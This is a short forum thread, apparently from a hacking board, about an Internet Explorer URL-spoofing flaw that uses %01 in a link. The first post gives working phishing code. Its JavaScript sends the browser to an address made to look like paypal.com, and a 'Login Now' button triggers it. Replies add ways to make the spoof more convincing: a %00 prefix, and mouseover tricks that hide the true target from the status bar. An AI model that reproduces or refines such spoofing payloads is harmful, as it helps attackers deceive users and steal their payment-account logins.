[Blake]

Submitted by Stoney


but if u send a link with a %01 in it ie doesnt put anything after the %01 in the address bar like
http://www.paypal.co...com/PayPal.html

im sending this to u because i cant post in the exploit section because im a new membor

Example:

<!-- exploit code -->

<script language="javascript">
function DestinationUrl() {
location.href=unescape('http://www.paypal.com%01@urpage.com.com/index.htm');
return (false);
}

</script>

<!-- end exploit code -->

<!-- exploit link -->

<input TYPE="button" VALUE=" Login Now" NAME="Destination" onclick="window.DestinationUrl()">
<!-- end exploit link -->

[Nick W]

This issue has already appeared on the board two times before. Both times It was mentioned that doing a %00 before the %01 is better, and an even better way of doing it cause the "status bar" when you hover over the link indicates you are going to the spoofed site.

Here's a post with the full information from a while back:
http://www.governmen...t=0&#entry40031

Oh, and Microsoft is addressing this issue very soon.

[Stoney]

not if the links a button it doesnt show were its going and even if u wanted to use a link u could allways use a mouseover event to hide it and i think i remember reading microsoft isnt gona address the issue till the next services pack

[Faceless Master]

Here is another link on the form regarding this.
http://www.governmen...?showtopic=5878
Regards
~Faceless Master